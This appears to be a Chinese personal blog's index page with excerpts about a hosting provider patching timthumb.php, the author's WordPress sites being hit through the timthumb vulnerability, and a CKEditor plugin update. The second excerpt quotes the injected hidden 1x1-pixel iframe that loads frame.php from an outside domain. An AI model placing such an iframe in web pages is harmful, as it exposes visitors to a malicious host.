其他

HostMonster今天更新了timthumb.php

一大早就收到一封HostMonster的邮件,标题“Hostmonster Corrected a Security Risk On Your  Account.” 原来主机提供商自己也检测了timthumb漏洞,这个漏洞最近闹的人心惶惶,如果一个服务器上放了很多wordpress网站,自己查找哪个主题或者插件用了timthumb貌似真的很累,如果更新的不完全,只改了一部分,还是会被入侵。我的就是一个例子,因为乱七八糟的网站多了点,有的timthumb就给漏掉了,结果更新了一次过几天发现又被入侵了。有服务商出面解决这个问题,似乎省心多了

继续阅读HostMonster今天更新了timthumb.php
WordPress

timthumb漏洞导致iframe攻击,wp-settings.php被修改

wordpress主题中一个很常用的处理图片的工具timthumb.php因为远程存储文件时候的验证上不足而产生了漏洞,允许在cache文件夹中执行一些php脚本,这已经不是什么秘密,可我就是中了招。 某天打开网站,发现服务器上所有的wordpress网站在firefox中都会打开一个弹出窗口,提示下载frame.php,这应该不是代码本意,不知道我的firefox出了啥问题,其实是在源代码里多了隐藏的iframe,用firebug查看源代码,可以看到下面的内容

<iframe id="iframe" src="%20http://counter-wordpress.com/frame.php" style="width: 1px; height: 1px;">

继续阅读timthumb漏洞导致iframe攻击,wp-settings.php被修改
生活琐记

CKEditor再次更新

上次谈到新版ckeditor for wordpress插件与导致woo themes的主题选项无法使用。今天突然发现CKEditor for WordPress 又发布了一个更新,装上后发现wordPress 控制板里的快速发布不再被ckeditor替换,这算是一大进步,可是仍然与我装的woo themes主题冲突。虽然更新了但不打算立刻换,不然辛苦定制的表情又要没了,每次更新ckeditor的核心文件都会被完全替换,没办法保存定制化的更改,例如定制化的ckeditor smiley表情

继续阅读CKEditor再次更新